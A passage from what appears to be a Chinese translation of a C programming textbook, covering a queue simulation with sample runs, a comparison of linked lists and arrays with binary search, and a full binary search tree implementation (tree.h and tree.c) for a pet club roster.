= MIN_PER_HR / perhour; for (cycle = 0; cycle < cyclelimit; cycle++) { if (newcustomer(min_per_cust)) { if (QueueIsFull(&line)) turnaways++; else { 1380 customers++; temp = customertime(cycle); EnQueue(temp, &line); } } if (wait_time <= 0 && !QueueIsEmpty(&line)) { DeQueue(&temp, &line); wait_time = temp.processtime; line_wait += cycle - temp.arrive; served++; } if (wait_time > 0) wait_time--; sum_line += QueueItemCount(&line); } if (customers > 0) { printf("customers accepted: %ld\n", customers); 1381 printf("  customers served: %ld\n", served); printf("     turnaways: %ld\n", turnaways); printf("average queue size: %.2f\n", (double) sum_line / cyclelimit); printf(" average wait time: %.2f minutes\n", (double) line_wait / served); } else puts("No customers!"); EmptyTheQueue(&line); puts("Bye!"); return 0; } // x是顾客到来的平均时间(单位:分钟) // 如果1分钟内有顾客到来,则返回true bool newcustomer(double x) { if (rand() * x / RAND_MAX < 1) return true; 1382 else return false; } // when是顾客到来的时间 // 该函数返回一个Item结构,该顾客到达的时间设置为when, // 咨询时间设置为1~3的随机值 Item customertime(long when) { Item cust; cust.processtime = rand() % 3 + 1; cust.arrive = when; return cust; } 该程序允许用户指定模拟运行的小时数和每小时平均有多少位顾客。模 拟时间较长得出的值较为平均,模拟时间较短得出的值随时间的变化而随机 变化。下面的运行示例解释了这一点(先保持每小时的顾客平均数量不 变)。注意,在模拟80小时和800小时的情况下,平均队伍长度和等待时间 基本相同。但是,在模拟 1 小时的情况下这两个量差别很大,而且与长时间 模拟的情况差别也很大。这是因为小数量的统计样本往往更容易受相对变化 的影响。 Case Study: Sigmund Lander's Advice Booth 1383 Enter the number of simulation hours: 80 Enter the average number of customers per hour: 20 customers accepted: 1633 customers served: 1633 turnaways: 0 average queue size: 0.46 average wait time: 1.35 minutes Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 800 Enter the average number of customers per hour: 20 customers accepted: 16020 customers served: 16019 turnaways: 0 average queue size: 0.44 average wait time: 1.32 minutes 1384 Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 1 Enter the average number of customers per hour: 20 customers accepted: 20 customers served: 20 turnaways: 0 average queue size: 0.23 average wait time: 0.70 minutes Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 1 Enter the average number of customers per hour: 20 customers accepted: 22 customers served: 22 turnaways: 0 average queue size: 0.75 1385 average wait time: 2.05 minutes 然后保持模拟的时间不变,改变每小时的顾客平均数量: Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 80 Enter the average number of customers per hour: 25 customers accepted: 1960 customers served: 1959 turnaways: 3 average queue size: 1.43 average wait time: 3.50 minutes Case Study: Sigmund Lander's Advice Booth Enter the number of simulation hours: 80 Enter the average 
number of customers per hour: 30 customers accepted: 2376 customers served: 2373 1386 turnaways: 94 average queue size: 5.85 average wait time: 11.83 minutes 注意,随着每小时顾客平均数量的增加,顾客的平均等待时间迅速增 加。在每小时20位顾客(80小时模拟时间)的情况下,每位顾客的平均等待 时间是1.35分钟;在每小时25位顾客的情况下,平均等待时间增加至3.50分 钟;在每小时30位顾客的情况下,该数值攀升至11.83分钟。而且,这3种情 况下被拒顾客分别从0位增加至3位最后陡增至94位。Sigmund可以根据程序 模拟的结果决定是否要增加一个摊位。 1387 17.6 链表和数组 许多编程问题,如创建一个简单链表或队列,都可以用链表(指的是动 态分配结构的序列链)或数组来处理。每种形式都有其优缺点,所以要根据 具体问题的要求来决定选择哪一种形式。表17.1总结了链表和数组的性质。 表17.1 比较数组和链表 接下来,详细分析插入和删除元素的过程。在数组中插入元素,必须移 动其他元素腾出空位插入新元素,如图17.9所示。新插入的元素离数组开头 越近,要被移动的元素越多。然而,在链表中插入节点,只需给两个指针赋 值,如图17.10所示。类似地,从数组中删除一个元素,也要移动许多相关 的元素。但是从链表中删除节点,只需重新设置一个指针并释放被删除节点 占用的内存即可。 1388 图17.9 在数组中插入一个元素 1389 图17.10 在链表中插入一个元素 接下来,考虑如何访问元素。对数组而言,可以使用数组下标直接访问 该数组中的任意元素,这叫做随机访问(random access)。对链表而言,必 须从链表首节点开始,逐个节点移动到要访问的节点,这叫做顺序访问 (sequential access)。当然,也可以顺序访问数组。只需按顺序递增数组下 标即可。在某些情况下,顺序访问足够了。例如,显示链表中的每一项,顺 序访问就不错。其他情况用随机访问更合适。 假设要查找链表中的特定项。一种算法是从列表的开头开始按顺序查 找,这叫做顺序查找(sequential search)。如果项并未按某种顺序排列,则 只能顺序查找。如果待查找的项不在链表里,必须查找完所有的项才知道该 项不在链表中(在这种情况下可以使用并发编程,同时查找列表中的不同部 分)。 1390 我们可以先排序列表,以改进顺序查找。这样,就不必查找排在待查找 项后面的项。例如,假设在一个按字母排序的列表中查找Susan。从开头开 始查找每一项,直到Sylvia都没有查找到Susan。这时就可以退出查找,因为 如果Susan在列表中,应该排在Sylvia前面。平均下来,这种方法查找不在列 表中的项的时间减半。 对于一个排序的列表,用二分查找(binary search)比顺序查找好得 多。下面分析二分查找的原理。首先,把待查找的项称为目标项,而且假设 列表中的各项按字母排序。然后,比较列表的中间项和目标项。如果两者相 等,查找结束;假设目标项在列表中,如果中间项排在目标项前面,则目标 项一定在后半部分项中;如果中间项在目标项后面,则目标项一定在前半部 分项中。无论哪种情况,两项比较的结果都确定了下次查找的范围只有列表 的一半。接着,继续使用这种方法,把需要查找的剩下一半的中间项与目标 项比较。同样,这种方法会确定下一次查找的范围是当前查找范围的一半。 以此类推,直到找到目标项或最终发现列表中没有目标项(见图17.11)。 这种方法非常有效率。假如有127个项,顺序查找平均要进行64次比较才能 找到目标项或发现不在其中。但是二分查找最多只用进行7次比较。第1次比 较剩下63项进行比较,第2次比较剩下31项进行比较,以此类推,第6次剩下 最后1项进行比较,第7次比较确定剩下的这个项是否是目标项。一般而言, n 次比较能处理有 2n-1 个元素的数组。所以项数越多,越能体现二分查找的 优势。 1391 1392 图17.11 用二分查找法查找Susan 用数组实现二分查找很简单,因为可以使用数组下标确定数组中任意部 分的中点。只要把数组的首元素和尾元素的索引相加,得到的和再除以2 即 可。例如,内含100 个元素的数组,首元素下标是0,尾元素下标是99,那 么用于首次比较的中间项的下标应为(0+99)/2,得49(整数除法)。如果比 较的结果是下标为49的元素在目标项的后面,那么目标项的下标应在0~48 的范围内。所以,第2次比较的中间项的下标应为(0+48)/2,得24。如果中 间项与目标项的比较结果是,中间项在目标项前面,那么第3次比较的中间 项下标应为(25+48)/2,得 36。这体现了随机访问的特性,可以从一个位置 跳至另一个位置,不用一次访问两位置之间的项。但是,链表只支持顺序访 问,不提供跳至中间节点的方法。所以在链表中不能使用二分查找。 如前所述,选择何种数据类型取决于具体的问题。如果因频繁地插入和 删除项导致经常调整大小,而且不需要经常查找,选择链表会更好。如果只 是偶尔插入或删除项,但是经常进行查找,使用数组会更好。 如果需要一种既支持频繁插入和删除项又支持频繁查找的数据形式,数 组和链表都无法胜任,怎么办?这种情况下应该选择二叉查找树。 1393 17.7 二叉查找树 二叉查找树是一种结合了二分查找策略的链接结构。二叉树的每个节点 都包含一个项和两个指向其他节点(称为子节点)的指针。图17.12演示了 二叉查找树中的节点是如何链接的。二叉树中的每个节点都包含两个子节点 ——左节点和右节点,其顺序按照如下规定确定:左节点的项在父节点的项 前面,右节点的项在父节点的项后面。这种关系存在于每个有子节点的节点 中。进一步而言,所有可以追溯其祖先回到一个父节点的左节点的项,都在 该父节点项的前面;所有以一个父节点的右节点为祖先的项,都在该父节点 项的后面。图17.12中的树以这种方式储存单词。有趣的是,与植物学的树 相反,该树的顶部被称为根(root)。树具有分层组织,所以以这种方式储 存的数据也以等级或层次组织。一般而言,每级都有上一级和下一级。如果 二叉树是满的,那么每一级的节点数都是上一级节点数的两倍。 图17.12 一个从存储单词的二叉树 二叉查找树中的每个节点是其后代节点的根,该节点与其后代节点构成 称了一个子树(subtree)。如图 17.12 所示,包含单词fate、carpet和llama的 1394 节点构成了整个二叉树的左子树,而单词 voyage是style-plenum-voyage子树 的右子树。 假设要在二叉树中查找一个项(即目标项)。如果目标项在根节点项的 前面,则只需查找左子树;如果目标项在根节点项的后面,则只需查找右子 树。因此,每次比较就排除半个树。假设查找左子树,这意味着目标项与左 子节点项比较。如果目标项在左子节点项的前面,则只需查找其后代节点的 左半部分,以此类推。与二分查找类似,每次比较都能排除一半的可能匹配 项。 我们用这种方法来查找puppy是否在图17.12的二叉树中。比较puppy和 melon(根节点项),如果puppy在该树中,一定在右子树中。因此,在右子 树中比较puppy和style,发现puppy在style前面,所以必须链接到其左节点。 然后发现该节点是plenum,在puppy前面。现在要向下链接到该节点的右子 节点,但是没有右子节点了。所以经过3次比较后发现puppy不在该树中。 二叉查找树在链式结构中结合了二分查找的效率。但是,这样编程的代 价是构建一个二叉树比创建一个链表更复杂。下面我们在下一个ADT项目中 创建一个二叉树。 17.7.1 二叉树ADT 和前面一样,先从概括地定义二叉树开始。该定义假设树不包含相同的 项。许多操作与链表相同,区别在于数据层次的安排。下面建立一个非正式 的树定义: 类型名:    二叉查找树 类型属性:    二叉树要么是空节点的集合(空树),要么是有一 个根节点的节点集合 每个节点都有两个子树,叫做左子树和右子树 每个子树本身也是一个二叉树,也有可能是空树 1395 二叉查找树是一个有序的二叉树,每个节点包含一个项, 左子树的所有项都在根节点项的前面,右子树的所有项都在根节点项的 后面 类型操作:    初始化树为空 确定树是否为空 确定树是否已满 
确定树中的项数 在树中添加一个项 在树中删除一个项 在树中查找一个项 在树中访问一个项 清空树 17.7.2 二叉查找树接口 原则上,可以用多种方法实现二叉查找树,甚至可以通过操控数组下标 用数组来实现。但是,实现二叉查找树最直接的方法是通过指针动态分配链 式节点。因此我们这样定义: typedef SOMETHING Item; typedef struct trnode { Item item; 1396 struct trnode * left; struct trnode * right; } Trn; typedef struct tree { Trnode * root; int size; } Tree; 每个节点包含一个项、一个指向左子节点的指针和一个指向右子节点的 指针。可以把 Tree 定义为指向 Trnode 的指针类型,因为只需要知道根节点 的位置就可访问整个树。然而,使用有成员大小的结构能很方便地记录树的 大小。 我们要开发一个维护 Nerfville 宠物俱乐部的花名册,每一项都包含宠 物名和宠物的种类。程序清单17.10就是该花名册的接口。我们把树的大小 限制为10,较小的树便于在树已满时测试程序的行为是否正确。当然,你也 可以把MAXITEMS设置为更大的值。 程序清单17.10 tree.h接口头文件 /* tree.h -- 二叉查找数     */ /*      树种不允许有重复的项 */ #ifndef _TREE_H_ #define _TREE_H_ 1397 #include <stdbool.h> /* 根据具体情况重新定义 Item */ #define SLEN 20 typedef struct item { char petname[SLEN]; char petkind[SLEN]; } Item; #define MAXITEMS 10 typedef struct trnode { Item item; struct trnode * left;   /* 指向左分支的指针 */ struct trnode * right; /* 指向右分支的指针 */ } Trnode; typedef struct tree { Trnode * root;/* 指向根节点的指针     */ int size;   /* 树的项数         */ 1398 } Tree; /* 函数原型 */ /* 操作:   把树初始化为空*/ /* 前提条件:  ptree指向一个树   */ /* 后置条件:  树被初始化为空  */ void InitializeTree(Tree * ptree); /* 操作:   确定树是否为空            */ /* 前提条件:  ptree指向一个树           */ /* 后置条件:  如果树为空,该函数返回true      */ /*        否则,返回false         */ bool TreeIsEmpty(const Tree * ptree); /* 操作:   确定树是否已满            */ /* 前提条件:  ptree指向一个树           */ /* 后置条件:  如果树已满,该函数返回true      */ /*        否则,返回false         */ bool TreeIsFull(const Tree * ptree); /* 操作:   确定树的项数             */ /* 前提条件:  ptree指向一个树           */ /* 后置条件:  返回树的项数             */ 1399 int TreeItemCount(const Tree * ptree); /* 操作:   在树中添加一个项           */ /* 前提条件:  pi是待添加项的地址          */ /*        ptree指向一个已初始化的树    */ /* 后置条件:  如果可以添加,该函数将在树中添加一个项  */ /*        并返回true;否则,返回false   */ bool AddItem(const Item * pi, Tree * ptree); /* 操作:   在树中查找一个项           */ /* 前提条件:  pi指向一个项            */ /*        ptree指向一个已初始化的树    */ /* 后置条件:  如果在树中添加一个项,该函数返回true  */ /*        否则,返回false         */ bool InTree(const Item * pi, const Tree * ptree); /* 操作:   从树中删除一个项           */ /* 前提条件:  pi是删除项的地址           */ /*        ptree指向一个已初始化的树    */ /* 后置条件:  如果从树中成功删除一个项,该函数返回true*/ /*        否则,返回false         */ bool DeleteItem(const Item * pi, Tree * ptree); 1400 /* 操作:   把函数应用于树中的每一项        */ /* 前提条件:  ptree指向一个树           */ /*        pfun指向一个函数,       */ /*        该函数接受一个Item类型的参数,并无返回值*/ /* 后置条件:  pfun指向的这个函数为树中的每一项执行一次*/ void Traverse(const Tree * ptree, void(*pfun)(Item item)); /* 操作:   删除树中的所有内容          */ /* 前提条件:  ptree指向一个已初始化的树       */ /* 后置条件:  树为空               */ void DeleteAll(Tree * ptree); #endif 17.7.3 二叉树的实现 接下来,我们要实现tree.h中的每个函数。InitializeTree()、 EmptyTree()、FullTree()和TreeItems()函数都很简单,与链表ADT、队列ADT 类似,所以下面着重讲解其他函数。 1.添加项 在树中添加一个项,首先要检查该树是否有空间放得下一个项。由于我 们定义二叉树时规定其中的项不能重复,所以接下来要检查树中是否有该 项。通过这两步检查后,便可创建一个新节点,把待添加项拷贝到该节点 中,并设置节点的左指针和右指针都为NULL。这表明该节点没有子节点。 然后,更新Tree结构的 size 成员,统计新增了一项。接下来,必须找出应该 把这个新节点放在树中的哪个位置。如果树为空,则应设置根节点指针指向 1401 该新节点。否则,遍历树找到合适的位置放置该节点。AddItem()函数就根 据这个思路来实现,并把一些工作交给几个尚未定义的函数:SeekItem()、 MakeNode()和AddNode()。 bool AddItem(const Item * pi, Tree * ptree) { Trnode * new_node; if (TreeIsFull(ptree)) { fprintf(stderr, "Tree is full\n"); return false;     /* 提前返回  */ } if (SeekItem(pi, ptree).child != NULL) { fprintf(stderr, "Attempted to add duplicate item\n"); return false;     /* 提前返回  */ } new_node = MakeNode(pi);  /* 指向新节点 */ if (new_node == NULL) { fprintf(stderr, "Couldn't create node\n"); 1402 return false;     /* 提前返回  */ } /* 成功创建了一个新节点 */ ptree->size++; if (ptree->root == NULL)      /* 
情况1:树为空    */ ptree->root = new_node;     /* 新节点是根节点    */ else                /* 情况2:树不为空   */ AddNode(new_node, ptree->root);/* 在树中添加一个节点*/ return true; /* 成功返回 */ } SeekItem()、MakeNode()和 AddNode()函数不是 Tree 类型公共接口的一 部分。它们是隐藏在tree.c文件中的静态函数,处理实现的细节(如节点、 指针和结构),不属于公共接口。 MakeNode()函数相当简单,它处理动态内存分配和初始化节点。该函 数的参数是指向新项的指针,其返回值是指向新节点的指针。如果 malloc() 无法分配所需的内存,则返回空指针。只有成功分配了内存,MakeNode() 函数才会初始化新节点。下面是MakeNode()的代码: static Trnode * MakeNode(const Item * pi) { Trnode * new_node; new_node = (Trnode *) malloc(sizeof(Trnode)); 1403 if (new_node != NULL) { new_node->item = *pi; new_node->left = NULL; new_node->right = NULL; } return new_node; } AddNode()函数是二叉查找树包中最麻烦的第2个函数。它必须确定新 节点的位置,然后添加新节点。具体来说,该函数要比较新项和根项,以确 定应该把新项放在左子树还是右子树中。如果新项是一个数字,则使用<和 >进行比较;如果新项是一个字符串,则使用strcmp()函数来比较。但是,该 项是内含两个字符串的结构,所以,必须自定义用于比较的函数。如果新项 应放在左子树中,ToLeft()函数(稍后定义)返回true;如果新项应放在右子 树中,ToRight()函数(稍后定义)返回true。这两个函数分别相当于<和>。 假设把新项放在左子树中。如果左子树为空,AddNode()函数只需让左子节 点指针指向新项即可。如果左子树不为空怎么办?此时,AddNode()函数应 该把新项和左子节点中的项做比较,以确定新项应该放在该子节点的左子树 还是右子树。这个过程一直持续到函数发现一个空子树为止,并在此此处添 加新节点。递归是一种实现这种查找过程的方法,即把AddNode()函数应用 于子节点,而不是根节点。当左子树或右子树为空时,即当root->left或root- >right为NULL时,函数的递归调用序列结束。记住,root是指向当前子树顶 部的指针,所以每次递归调用它都指向一个新的下一级子树(递归详见第9 章)。 static void AddNode(Trnode * new_node, Trnode * root) 1404 { if (ToLeft(&new_node->item, &root->item)) { if (root->left == NULL)       /* 空子树 */ root->left = new_node;     /* 所以,在此处添加节点 */ else AddNode(new_node, root->left); /* 否则,处理该子树*/ } else if (ToRight(&new_node->item, &root->item)) { if (root->right == NULL) root->right = new_node; else AddNode(new_node, root->right); } else                  /* 不应含有重复的项 */ { fprintf(stderr, "location error in AddNode()\n"); exit(1); 1405 } } ToLeft()和ToRight()函数依赖于Item类型的性质。Nerfville宠物俱乐部的 成员名按字母排序。如果两个宠物名相同,按其种类排序。如果种类也相 同,这两项属于重复项,根据该二叉树的定义,这是不允许的。回忆一下, 如果标准C库函数strcmp()中的第1个参数表示的字符串在第2个参数表示的字 符串前面,该函数则返回负数;如果两个字符串相同,该函数则返回0;如 果第1个字符串在第2个字符串后面,该函数则返回正数。ToRight()函数的实 现代码与该函数类似。通过这两个函数完成比较,而不是直接在AddNode() 函数中直接比较,这样的代码更容易适应新的要求。当需要比较不同的数据 形式时,就不必重写整个AddNode()函数,只需重写Toleft()和ToRight()即 可。 static bool ToLeft(const Item * i1, const Item * i2) { int comp1; if ((comp1 = strcmp(i1->petname, i2->petname)) < 0) return true; else if (comp1 == 0 && strcmp(i1->petkind, i2->petkind) < 0) return true; else return false; 1406 } 2.查找项 3个接口函数都要在树中查找特定项:AddItem()、InItem()和 DeleteItem()。这些函数的实现中使用SeekItem()函数进行查找。DeleteItem() 函数有一个额外的要求:该函数要知道待删除项的父节点,以便在删除子节 点后更新父节点指向子节点的指针。因此,我们设计SeekItem()函数返回的 结构包含两个指针:一个指针指向包含项的节点(如果未找到指定项则为 NULL);一个指针指向父节点(如果该节点为根节点,即没有父节点,则 为NULL)。这个结构类型的定义如下: typedef struct pair { Trnode * parent; Trnode * child; } Pair; SeekItem()函数可以用递归的方式实现。但是,为了给读者介绍更多编 程技巧,我们这次使用while循环处理树中从上到下的查找。和AddNode()一 样,SeekItem()也使用ToLeft()和ToRight()在树中导航。开始时,SeekItem()设 置look.child指针指向该树的根节点,然后沿着目标项应在的路径重置 look.child指向后续的子树。同时,设置look.parent指向后续的父节点。如果 没有找到匹配的项, look.child则被设置为NULL。如果在根节点找到匹配的 项,则设置look.parent为NULL,因为根节点没有父节点。下面是SeekItem() 函数的实现代码: static Pair SeekItem(const Item * pi, const Tree * ptree) { Pair look; 1407 look.parent = NULL; look.child = ptree->root; if (look.child == NULL) return look; /* 提前退出 */ while (look.child != NULL) { if (ToLeft(pi, &(look.child->item))) { look.parent = look.child; look.child = look.child->left; } else if (ToRight(pi, &(look.child->item))) { look.parent = look.child; look.child = look.child->right; } else     /* 如果前两种情况都不满足,则必定是相等的情况 */ break;    /* look.child 目标项的节点 */ } 1408 return look;   /* 成功返回 */ } 注意,如果 SeekItem()函数返回一个结构,那么该函数可以与结构成员 运算符一起使用。例如, AddItem()函数中有如下的代码: if (SeekItem(pi, ptree).child != NULL) 
有了SeekItem()函数后,编写InTree()公共接口函数就很简单了: bool InTree(const Item * pi, const Tree * ptree) { return (SeekItem(pi, ptree).child == NULL) ? false : true; } 3.考虑删除项 删除项是最复杂的任务,因为必须重新连接剩余的子树形成有效的树。 在准备编写这部分代码之前,必须明确需要做什么。 图17.13演示了最简单的情况。待删除的节点没有子节点,这样的节点 被称为叶节点(leaf)。这种情况只需把父节点中的指针重置为NULL,并使 用free()函数释放已删除节点所占用的内存。 1409 图17.13 删除一个叶节点 删除带有一个子节点的情况比较复杂。删除该节点会导致其子树与其他 部分分离。为了修正这种情况,要把被删除节点父节点中储存该节点的地址 更新为该节点子树的地址(见图17.14)。 1410 图17.14 删除有一个子节点的节点 最后一种情况是删除有两个子树的节点。其中一个子树(如左子树)可 连接在被删除节点之前连接的位置。但是,另一个子树怎么处理?牢记树的 基本设计:左子树的所有项都在父节点项的前面,右子树的所有项都在父节 点项的后面。也就是说,右子树的所有项都在左子树所有项的后面。而且, 因为该右子树曾经是被删除节点的父节点的左子树的一部分,所以该右节点 中的所有项在被删除节点的父节点项的前面。想像一下如何在树中从上到下 查找该右子树的头所在的位置。它应该在被删除节点的父节点的前面,所以 要沿着父节点的左子树向下找。但是,该右子树的所有项又在被删除节点左 子树所有项的后面。因此要查看左子树的右支是否有新节点的空位。如果没 1411 有,就要沿着左子树的右支向下找,一直找到一个空位为止。图17.15演示 了这种方法。 图17.15 删除一个有两个子节点的项 ① 删除一个节点 现在可以设计所需的函数了,可以分成两个任务:第一个任务是把特定 项与待删除节点关联;第二个任务是删除节点。无论哪种情况都必须修改待 删除项父节点的指针。因此,要注意以下两点。 1412 该程序必须标识待删除节点的父节点。 为了修改指针,代码必须把该指针的地址传递给执行删除任务的函数。 第一点稍后讨论,下面先分析第二点。要修改的指针本身是Trnode *类 型,即指向Trnode的指针。由于该函数的参数是该指针的地址,所以参数的 类型是Trnode **,即指向指针(该指针指向Trnode)的指针。假设有合适的 地址可用,可以这样编写执行删除任务的函数: static void DeleteNode(Trnode **ptr) /* ptr 是指向目标节点的父节点指针成员的地址 */ { Trnode * temp; if ((*ptr)->left == NULL) { temp = *ptr; *ptr = (*ptr)->right; free(temp); } else if ((*ptr)->right == NULL) { temp = *ptr; *ptr = (*ptr)->left; 1413 free(temp); } else /* 被删除的节点有两个子节点 */ { /* 找到重新连接右子树的位置 */ for (temp = (*ptr)->left; temp->right != NULL; temp = temp->right) continue; temp->right = (*ptr)->right; temp = *ptr; *ptr = (*ptr)->left; free(temp); } } 该函数显式处理了 3 种情况:没有左子节点的节点、没有右子节点的节 点和有两个子节点的节点。无子节点的节点可作为无左子节点的节点的特 例。如果该节点没有左子节点,程序就将右子节点的地址赋给其父节点的指 针。如果该节点也没有右子节点,则该指针为NULL。这就是无子节点情况 的值。 注意,代码中用临时指针记录被删除节点的地址。被删除节点的父节点 指针(*ptr)被重置后,程序会丢失被删除节点的地址,但是free()函数需要 1414 这个信息。所以,程序把*ptr的原始值储存在temp中,然后用free()函数使用 temp来释放被删除节点所占用的内存。 有两个子节点的情况,首先在for循环中通过temp指针从左子树的右半 部分向下查找一个空位。找到空位后,把右子树连接于此。然后,再用 temp 保存被删除节点的位置。接下来,把左子树连接到被删除节点的父节 点上,最后释放temp指向的节点。 注意,由于ptr的类型是Trnode **,所以*ptr的类型是Trnode *,与temp的 类型相同。 ② 删除一个项 剩下的问题是把一个节点与特定项相关联。可以使用SeekItem()函数来 完成。回忆一下,该函数返回一个结构(内含两个指针,一个指针指向父节 点,一个指针指向包含特定项的节点)。然后就可以通过父节点的指针获得 相应的地址传递给DeleteNode()函数。根据这个思路,DeleteNode()函数的定 义如下: bool DeleteItem(const Item * pi, Tree * ptree) { Pair look; look = SeekItem(pi, ptree); if (look.child == NULL) return false; if (look.parent == NULL)  /* 删除根节点 */ DeleteNode(&ptree->root); 1415 else if (look.parent->left == look.child) DeleteNode(&look.parent->left); else DeleteNode(&look.parent->right); ptree->size--; return true; } 首先,SeekItem()函数的返回值被赋给look类型的结构变量。如果 look.child是NULL,表明未找到指定项,DeleteItem()函数退出,并返回 false。如果找到了指定的Item,该函数分3种情况来处理。第一种情况是, look.parent的值为NULL,这意味着该项在根节点中。在这情况下,不用更新 父节点,但是要更新Tree结构中根节点的指针。因此,函数该函数把该指针 的地址传递给DeleteNode()函数。否则(即剩下两种情况),程序判断待删 除节点是其父节点的左子节点还是右子节点,然后传递合适指针的地址。 注意,公共接口函数(DeleteItem())处理的是最终用户所关心的问题 (项和树),而隐藏的DeleteNode()函数处理的是与指针相关的实质性任 务。 4.遍历树 遍历树比遍历链表更复杂,因为每个节点都有两个分支。这种分支特性 很适合使用分而制之的递归(详见第9章)来处理。对于每一个节点,执行 遍历任务的函数都要做如下的工作: 处理节点中的项; 处理左子树(递归调用); 1416 处理右子树(递归调用)。 可以把遍历分成两个函数来完成:Traverse()和InOrder()。注意, InOrder()函数处理左子树,然后处理项,最后处理右子树。这种遍历树的顺 序是按字母排序进行。如果你有时间,可以试试用不同的顺序,比如,项- 左子树-右子树或者左子树-右子树-项,看看会发生什么。 void Traverse(const Tree * ptree, void(*pfun)(Item item)) { if (ptree != NULL) InOrder(ptree->root, pfun); } static void InOrder(const Trnode * root, void(*pfun)(Item item)) { if (root != NULL) { InOrder(root->left, pfun); (*pfun)(root->item); InOrder(root->right, pfun); } } 5.清空树 1417 清空树基本上和遍历树的过程相同,即清空树的代码也要访问每个节 点,而且要用 free()函数释放内存。除此之外,还要重置Tree类型结构的成 员,表明该树为空。DeleteAll()函数负责处理Tree类型的结构,把释放内存 的任务交给 
DeleteAllNode()函数。DeleteAllNode()与 InOrder()函数的构造相 同,它储存了指针的值root->right,使其在释放根节点后仍然可用。下面是 这两个函数的代码: void DeleteAll(Tree * ptree) { if (ptree != NULL) DeleteAllNodes(ptree->root); ptree->root = NULL; ptree->size = 0; } static void DeleteAllNodes(Trnode * root) { Trnode * pright; if (root != NULL) { pright = root->right; DeleteAllNodes(root->left); free(root); 1418 DeleteAllNodes(pright); } } 6.完整的包 程序清单17.11演示了整个tree.c的代码。tree.h和tree.c共同组成了树的程 序包。 程序清单17.11 tree.c程序 /* tree.c -- 树的支持函数 */ #include <string.h> #include <stdio.h> #include <stdlib.h> #include "tree.h" /* 局部数据类型 */ typedef struct pair { Trnode * parent; Trnode * child; } Pair; /* 局部函数的原型 */ static Trnode * MakeNode(const Item * pi); 1419 static bool ToLeft(const Item * i1, const Item * i2); static bool ToRight(const Item * i1, const Item * i2); static void AddNode(Trnode * new_node, Trnode * root); static void InOrder(const Trnode * root, void(*pfun)(Item item)); static Pair SeekItem(const Item * pi, const Tree * ptree); static void DeleteNode(Trnode **ptr); static void DeleteAllNodes(Trnode * ptr); /* 函数定义 */ void InitializeTree(Tree * ptree) { ptree->root = NULL; ptree->size = 0; } bool TreeIsEmpty(const Tree * ptree) { if (ptree->root == NULL) return true; else return false; 1420 } bool TreeIsFull(const Tree * ptree) { if (ptree->size == MAXITEMS) return true; else return false; } int TreeItemCount(const Tree * ptree) { return ptree->size; } bool AddItem(const Item * pi, Tree * ptree) { Trnode * new_node; if (TreeIsFull(ptree)) { fprintf(stderr, "Tree is full\n"); return false;     /* 提前返回  */ 1421 } if (SeekItem(pi, ptree).child != NULL) { fprintf(stderr, "Attempted to add duplicate item\n"); return false;     /* 提前返回  */ } new_node = MakeNode(pi);  /* 指向新节点 */ if (new_node == NULL) { fprintf(stderr, "Couldn't create node\n"); return false;     /* 提前返回  */ } /* 成功创建了一个新节点 */ ptree->size++; if (ptree->root == NULL)      /* 情况1:树为空    */ ptree->root = new_node;     /* 新节点为树的根节点  */ else                /* 情况2:树不为空   */ AddNode(new_node, ptree->root);/* 在树中添加新节点   */ return true;            /* 成功返回      */ 1422 } bool InTree(const Item * pi, const Tree * ptree) { return (SeekItem(pi, ptree).child == NULL) ? 
false : true; } bool DeleteItem(const Item * pi, Tree * ptree) { Pair look; look = SeekItem(pi, ptree); if (look.child == NULL) return false; if (look.parent == NULL)      /* 删除根节点项     */ DeleteNode(&ptree->root); else if (look.parent->left == look.child) DeleteNode(&look.parent->left); else DeleteNode(&look.parent->right); ptree->size--; return true; 1423 } void Traverse(const Tree * ptree, void(*pfun)(Item item)) { if (ptree != NULL) InOrder(ptree->root, pfun); } void DeleteAll(Tree * ptree) { if (ptree != NULL) DeleteAllNodes(ptree->root); ptree->root = NULL; ptree->size = 0; } /* 局部函数 */ static void InOrder(const Trnode * root, void(*pfun)(Item item)) { if (root != NULL) { InOrder(root->left, pfun); 1424 (*pfun)(root->item); InOrder(root->right, pfun); } } static void DeleteAllNodes(Trnode * root) { Trnode * pright; if (root != NULL) { pright = root->right; DeleteAllNodes(root->left); free(root); DeleteAllNodes(pright); } } static void AddNode(Trnode * new_node, Trnode * root) { if (ToLeft(&new_node->item, &root->item)) { 1425 if (root->left == NULL)       /* 空子树       */ root->left = new_node;     /* 把节点添加到此处   */ else AddNode(new_node, root->left); /* 否则处理该子树    */ } else if (ToRight(&new_node->item, &root->item)) { if (root->right == NULL) root->right = new_node; else AddNode(new_node, root->right); } else                  /* 不允许有重复项    */ { fprintf(stderr, "location error in AddNode()\n"); exit(1); } } 1426 static bool ToLeft(const Item * i1, const Item * i2) { int comp1; if ((comp1 = strcmp(i1->petname, i2->petname)) < 0) return true; else if (comp1 == 0 &&strcmp(i1->petkind, i2->petkind) < 0) return true; else return false; } static bool ToRight(const Item * i1, const Item * i2) { int comp1; if ((comp1 = strcmp(i1->petname, i2->petname)) > 0) return true; else if (comp1 == 0 && strcmp(i1->petkind, i2->petkind) > 0) return true; else 1427 return false; } static Trnode * MakeNode(const Item * pi) { Trnode * new_node; new_node = (Trnode *) malloc(sizeof(Trnode)); if (new_node != NULL) { new_node->item = *pi; new_node->left = NULL; new_node->right = NULL; } return new_node; } static Pair SeekItem(const Item * pi, const Tree * ptree) { Pair look; look.parent = NULL; look.child = ptree->root; 1428 if (look.child == NULL) return look;          /* 提前返回  */ while (look.child != NULL) { if (ToLeft(pi, &(look.child->item))) { look.parent = look.child; look.child = look.child->left; } else if (ToRight(pi, &(look.child->item))) { look.parent = look.child; look.child = look.child->right; } else       /* 如果前两种情况都不满足,则必定是相等的情 况   */ break;    /* look.child 目标项的节点          */ } return look;          /* 成功返回 */ 1429 } static void DeleteNode(Trnode **ptr) /* ptr 是指向目标节点的父节点指针成员的地址 */ { Trnode * temp; if ((*ptr)->left == NULL) { temp = *ptr; *ptr = (*ptr)->right; free(temp); } else if ((*ptr)->right == NULL) { temp = *ptr; *ptr = (*ptr)->left; free(temp); } else  /* 被删除的节点有两个子节点 */ { 1430 /* 找到重新连接右子树的位置 */ for (temp = (*ptr)->left; temp->right != NULL;temp = temp->right) continue; temp->right = (*ptr)->right; temp = *ptr; *ptr = (*ptr)->left; free(temp); } } 17.7.4 使用二叉树 现在,有了接口和函数的实现,就可以使用它们了。程序清单17.12中 